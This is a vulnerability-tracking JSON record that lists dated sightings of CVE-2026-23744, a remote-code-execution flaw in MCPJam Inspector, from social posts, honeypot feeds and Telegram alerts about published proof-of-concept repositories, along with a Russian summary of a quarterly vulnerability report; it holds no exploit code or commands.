{"vulnerability": "cve-2026-23744", "sightings": [{"uuid": "f154430f-8021-46da-8e67-e12d76b62a7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://gist.github.com/alon710/0b21758440be51f5aa5777ceee2d957c", "content": "", "creation_timestamp": "2026-01-24T21:24:05.000000Z"}, {"uuid": "7726a3c5-f8e8-44d3-9c6a-06043ed46a2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/115935997438542873", "content": "", "creation_timestamp": "2026-01-22T00:48:52.671464Z"}, {"uuid": "27739e01-65f7-455f-ace3-ee6002066f42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/115936006347966952", "content": "", "creation_timestamp": "2026-01-22T00:51:09.786979Z"}, {"uuid": "eb1841ec-8b51-41b9-a044-104263f71a85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3memetavadf2k", "content": "", "creation_timestamp": "2026-02-11T21:03:13.780474Z"}, {"uuid": "5e80fee2-fb64-4059-8690-b4553291ece0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3mfn2uadnmz2j", "content": "", "creation_timestamp": "2026-02-24T21:02:30.304983Z"}, {"uuid": "98a33c20-d985-4cc8-bb74-6e09b496dc5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://bsky.app/profile/thehackerwire.bsky.social/post/3mckxoqvf4c2z", "content": "", "creation_timestamp": "2026-01-16T20:44:47.944411Z"}, {"uuid": "7671f05f-633f-4592-baf0-8b64935249be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mclbafogn52r", "content": "", "creation_timestamp": "2026-01-16T23:35:43.746459Z"}, {"uuid": "111715f1-da1a-4516-b6ca-83551678a8ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://gist.github.com/alon710/823a3bbfcca3d099b34e9d463edcf770", "content": "", "creation_timestamp": "2026-01-24T22:29:01.000000Z"}, {"uuid": "2b964c1f-072e-4872-8950-150ad45b514e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://gist.github.com/alon710/e88d8d0be10139f637b6f94a8ceb8766", "content": "", "creation_timestamp": "2026-01-24T22:28:58.000000Z"}, {"uuid": "3089ac56-d04e-49f4-bebf-18a66f00784b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-03)", "content": "", "creation_timestamp": "2026-04-03T00:00:00.000000Z"}, {"uuid": "35af05a5-b8cb-4c29-bbbd-e3508f87b1d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-01)", "content": "", "creation_timestamp": "2026-04-01T00:00:00.000000Z"}, {"uuid": "bbf017eb-09fd-4f77-9acb-60ed2471fa3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-03)", "content": "", "creation_timestamp": "2026-04-03T00:00:00.000000Z"}, {"uuid": "44b01352-576d-41f7-9786-9c74fe445c64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "published-proof-of-concept", "source": "Telegram/NQOCep9JXuunt-IAyUJYpZHdpB1OmZjsgFCnwZQxWJWW2jY", "content": "", "creation_timestamp": "2026-04-10T09:00:05.000000Z"}, {"uuid": "6758a9d5-4996-452c-83e0-09b0e49c25f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/79702", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a exploit-CVE-2026-23744\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a luiskrnr\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-10 05:57:10\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nMCPJam Inspector is a local-first development platform for MCP servers. In versions 1.4.2 (and earlier), a RCE flaw lets attackers send crafted HTTP request that installs an MCP server and runs code remotely, because the service listens on 0.0.0.0 (instead of 127.0.0.1) by default.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-10T06:00:04.000000Z"}, {"uuid": "d7bf6dd9-3915-4c31-b133-c83fa31c027f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/77536", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-23744-script\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a goosesmitty\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-03-27 15:58:37\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nExploit script for CVE-2026-23744\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-03-27T16:00:04.000000Z"}, {"uuid": "c3388019-1a2e-4de3-b1d3-0c283b2f72e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "published-proof-of-concept", "source": "Telegram/4Dok0lwX_JBk164h58WI7MYFHPq5Lse38n7xHVnp6ML19Yk", "content": "", "creation_timestamp": "2026-03-27T21:00:04.000000Z"}, {"uuid": "5cadf1ef-c5ec-4287-9596-5ad43663ef13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "published-proof-of-concept", "source": "Telegram/GTcyuS7tJ_1o48Qpvj3yt6_sMu_d2tWC8nNXcWvEXpiRzjo", "content": "", "creation_timestamp": "2026-03-29T21:00:05.000000Z"}, {"uuid": "023ae372-0e60-4de3-b621-a6169a58080c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/76866", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-23744\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a FrenzisRed\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-03-23 18:45:20\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-23744 - MCPJam inspector Remote-Code-Execution: Proof Of Concept (POC\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-03-23T19:00:04.000000Z"}, {"uuid": "20a9a40d-97c1-46dd-aa2f-52fd5ecee948", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://t.me/true_secator/8183", "content": "\u0421\u043e\u043b\u0430\u0440\u044b \u0432\u044b\u043a\u0430\u0442\u0438\u043b\u0438 \u043e\u0442\u0447\u0435\u0442 \u0441 \u043e\u0431\u0437\u043e\u0440\u043e\u043c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 \u0432 \u043f\u0435\u0440\u0432\u043e\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 2026 \u0433\u043e\u0434\u0430, \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044f \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0442\u044c \u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0438 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0445 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439 \u043d\u0430 \u043b\u0430\u043d\u0434\u0448\u0430\u0444\u0442\u0435 \u0443\u0433\u0440\u043e\u0437 \u044d\u0442\u043e\u0433\u043e \u0442\u0438\u043f\u0430.\n\n\u041e\u0442\u043c\u0435\u0442\u0438\u043c \u043a\u043b\u044e\u0447\u0435\u0432\u044b\u0435 \u0432\u044b\u0432\u043e\u0434\u044b:\n\n- \u041a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 \u043f\u0435\u0440\u0432\u043e\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 2026 \u0433\u043e\u0434\u0430 \u043f\u043e \u0441\u0440\u0430\u0432\u043d\u0435\u043d\u0438\u044e \u0441 \u0447\u0435\u0442\u0432\u0435\u0440\u0442\u044b\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u043e\u043c 2025 \u0433\u043e\u0434\u0430 \u0432\u044b\u0440\u043e\u0441\u043b\u043e \u043d\u0430 7% - \u0441 397 \u0434\u043e 426. \u0412 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u0440\u043e\u0441\u0442 \u043e\u0431\u0443\u0441\u043b\u043e\u0432\u043b\u0435\u043d \u0442\u0435\u043c \u0444\u0430\u043a\u0442\u043e\u043c, \u0447\u0442\u043e \u043c\u043d\u043e\u0433\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u043e \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u043c \u0434\u043e\u0441\u0442\u0443\u043f\u0435 \u043f\u043e\u044f\u0432\u0438\u043b\u0438\u0441\u044c \u0432 2026 \u0433\u043e\u0434\u0443, \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u0435\u0449\u0435 \u0432 2025 \u0433\u043e\u0434\u0443.\n\n- \u0421\u0435\u0442\u0435\u0432\u043e\u0439 \u0432\u0435\u043a\u0442\u043e\u0440 \u0438\u043c\u0435\u043b\u0438 83,84% \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439. \u0412 \u0447\u0435\u0442\u0432\u0435\u0440\u0442\u043e\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 2025 \u0433\u043e\u0434\u0430 \u044d\u0442\u043e\u0442 \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u043b 81%.\n\n- \u0421\u0440\u0435\u0434\u043d\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u043e\u0441\u0442\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0441\u043e\u0441\u0442\u0430\u0432\u0438\u043b 8,1 \u0431\u0430\u043b\u043b\u0430. \u0412 \u0447\u0435\u0442\u0432\u0435\u0440\u0442\u043e\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 - 7,8, \u0430 \u0433\u043e\u0434\u043e\u043c \u0440\u0430\u043d\u0435\u0435, \u043f\u043e \u0438\u0442\u043e\u0433\u0430\u043c \u043f\u0435\u0440\u0432\u043e\u0433\u043e \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0430 2025 \u0433\u043e\u0434\u0430, - 7,3.\n\n- 91,62% \u0432\u0441\u0435\u0445 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u0441\u0435\u0442\u0435\u0432\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 HTTP. \u0411\u043b\u0438\u0436\u0430\u0439\u0448\u0438\u0439 \u00ab\u043f\u0440\u0435\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u00bb - TCP (3,07%).\n\n- \u041d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0443\u0440\u043e\u0432\u043d\u044f Critical \u0438 High \u0432 \u0441\u043e\u0432\u043e\u043a\u0443\u043f\u043d\u043e\u0441\u0442\u0438 \u043f\u0440\u0438\u0448\u043b\u043e\u0441\u044c 72,06% - \u044d\u0442\u043e \u0437\u0430\u043c\u0435\u0442\u043d\u043e \u0432\u044b\u0448\u0435 \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044f \u0447\u0435\u0442\u0432\u0435\u0440\u0442\u043e\u0433\u043e \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0430 2025 \u0433\u043e\u0434\u0430 (69,3%), \u043d\u043e \u043b\u0438\u0448\u044c \u043d\u0435 \u043d\u0430\u043c\u043d\u043e\u0433\u043e \u0432\u044b\u0448\u0435, \u0447\u0435\u043c \u0431\u044b\u043b\u043e \u0432 \u043f\u0435\u0440\u0432\u043e\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 (71,5%).\n\n- \u0421\u0430\u043c\u044b\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u043c \u0443\u0436\u0435 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u043e\u0432 \u043f\u043e\u0434\u0440\u044f\u0434 \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f WordPress \u0438 \u043f\u043b\u0430\u0433\u0438\u043d\u044b \u0434\u043b\u044f \u043d\u0435\u0433\u043e (18,13%).\n\n\u0414\u043e\u043b\u044f \u0442\u0430\u043a\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 \u043e\u0431\u0449\u0435\u043c \u043e\u0431\u044a\u0435\u043c\u0435 \u0432\u044b\u0440\u043e\u0441\u043b\u0430 \u043d\u0430 4,7 \u043f\u0440\u043e\u0446\u0435\u043d\u0442\u043d\u044b\u0445 \u043f\u0443\u043d\u043a\u0442\u0430 \u0432 \u0441\u0440\u0430\u0432\u043d\u0435\u043d\u0438\u0438 \u0441 \u0447\u0435\u0442\u0432\u0435\u0440\u0442\u044b\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u043e\u043c. \u041e\u0434\u043d\u0430\u043a\u043e \u0432 \u0441\u0440\u0430\u0432\u043d\u0435\u043d\u0438\u0438 \u0441 \u043f\u0435\u0440\u0432\u044b\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u043e\u043c, \u043a\u043e\u0433\u0434\u0430 \u043d\u0430 WordPress \u043f\u0440\u0438\u0445\u043e\u0434\u0438\u043b\u043e\u0441\u044c 22,4% \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u043e\u043d\u0430 \u0443\u043f\u0430\u043b\u0430.\n\n- \u041f\u043e\u0441\u043b\u0435 \u0441\u043f\u0430\u0434\u0430 \u0432 \u0447\u0435\u0442\u0432\u0435\u0440\u0442\u043e\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 \u0432\u043d\u043e\u0432\u044c \u0432\u0435\u0440\u043d\u0443\u043b\u0430\u0441\u044c \u043a \u0440\u043e\u0441\u0442\u0443 \u0434\u043e\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 \u0418\u0418-\u0441\u0435\u0440\u0432\u0438\u0441\u0430\u0445.\n\n\u041d\u0430 \u043d\u0438\u0445 \u043f\u0440\u0438\u0448\u043b\u043e\u0441\u044c 4,83%. \u041f\u0440\u0438\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u043e, \u0447\u0442\u043e \u0432 \u0441\u0440\u0435\u0434\u043d\u0435\u043c \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u043e\u0441\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 \u0442\u0430\u043a\u0438\u0445 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445 - 9,2 \u0431\u0430\u043b\u043b\u0430. \u042d\u0442\u043e \u0441\u0430\u043c\u044b\u0439 \u0432\u044b\u0441\u043e\u043a\u0438\u0439 \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c \u0441\u0440\u0435\u0434\u0438 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432-\u043b\u0438\u0434\u0435\u0440\u043e\u0432 \u043f\u043e \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u0443 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439. \u0418\u0445 \u043d\u0430\u0445\u043e\u0434\u044f\u0442 \u0441\u0440\u0430\u0432\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u0434\u043a\u043e, \u043d\u043e \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u0438\u0437 \u0442\u0430\u043a\u0438\u0445 \u0431\u0440\u0435\u0448\u0435\u0439 \u0438\u043c\u0435\u044e\u0442 \u0432\u044b\u0441\u043e\u043a\u0438\u0439 \u0443\u0440\u043e\u0432\u0435\u043d\u044c \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u043e\u0441\u0442\u0438.\n\n\u041e\u0431\u0449\u0438\u043c \u0442\u0440\u0435\u043d\u0434\u043e\u043c \u043f\u0435\u0440\u0432\u043e\u0433\u043e \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0430 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u0435 \u0441\u043a\u0430\u043d\u0435\u0440\u043e\u0432 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0434\u043b\u044f \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0445 \u0418\u0418-\u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432. \u0422\u0430\u043a, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043f\u043e \u0434\u0430\u043d\u043d\u044b\u043c \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u043d\u0438\u0445, \u043d\u0430 \u043c\u0430\u0440\u0442 2026 \u0433. \u0432 AI-\u0430\u0433\u0435\u043d\u0442\u0435 OpenClaw \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442\u0441\u044f \u0431\u043e\u043b\u0435\u0435 522 CVE, \u0438 \u0435\u0436\u0435\u043d\u0435\u0434\u0435\u043b\u044c\u043d\u044b\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0430\u0437\u044b \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0442\u0441\u044f, \u0447\u0442\u043e \u0433\u043e\u0432\u043e\u0440\u0438\u0442 \u043e \u043a\u0440\u0438\u0437\u0438\u0441\u0435 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 OpenClaw. ClawJacked - \u044d\u0442\u043e \u043d\u043e\u0432\u044b\u0439 \u0432\u0435\u043a\u0442\u043e\u0440 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 AI-\u0430\u0433\u0435\u043d\u0442.\n\n\u0412 1-\u043c \u043a\u0432\u0430\u0440\u0442\u0430\u043b\u0435 2026 \u0433. \u0440\u0435\u0439\u0442\u0438\u043d\u0433 \u0441\u0430\u043c\u044b\u0445 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0438\u0441\u0445\u043e\u0434\u044f \u0438\u0437 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u0430 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c: CVE-2025-2304 (Camaleon CMS), CVE-2026-23744 (MCPJam Inspector), CVE-2026-21858 (n8n), CVE-2026-29000 (pac4j-jwt) \u0438 CVE-2026-21962 (Oracle Fusion Middleware).\n\n\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u0430\u044f \u0438\u043d\u0444\u043e\u0433\u0440\u0430\u0444\u0438\u043a\u0430 \u0438 \u0430\u043d\u0430\u043b\u0438\u0442\u0438\u043a\u0430 - \u0432 \u043e\u0442\u0447\u0435\u0442\u0435.", "creation_timestamp": "2026-05-07T16:20:06.000000Z"}, {"uuid": "d139a9d7-feb3-4f93-a805-1358a15d9ff6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/77842", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-23744\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a CyLock11\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-03-29 16:34:12\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-23744 - MCP Connect RCE via Unauthenticated Command Injection\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-03-29T17:00:04.000000Z"}, {"uuid": "9f064f9f-58a6-41f0-bf40-cc5d3d31c12a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "Telegram/Y_xNc4JrZ-tyC3UP8KNp3mHZkpQBlpIA1IgeHuDgcQrNJTo", "content": "", "creation_timestamp": "2026-05-10T21:00:05.000000Z"}, {"uuid": "788438ba-5df1-4dda-b92c-02bb336a1982", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "seen", "source": "https://t.me/GithubRedTeam/84255", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a kobold\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a ledksv\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-14 21:56:27\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nKobold \u2014 HackTheBox Medium writeup: CVE-2026-23744, PrivateBin LFI, Docker group escape to root\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-14T22:00:04.000000Z"}, {"uuid": "688b930b-c8ab-405b-8b78-59e24cbe0155", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-23744", "type": "published-proof-of-concept", "source": "https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6", "content": "", "creation_timestamp": "2026-01-16T19:35:41.000000Z"}, {"uuid": "526a2228-6590-4c9c-b3d5-a94fc705fb05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23744", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/86676", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #RCE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a 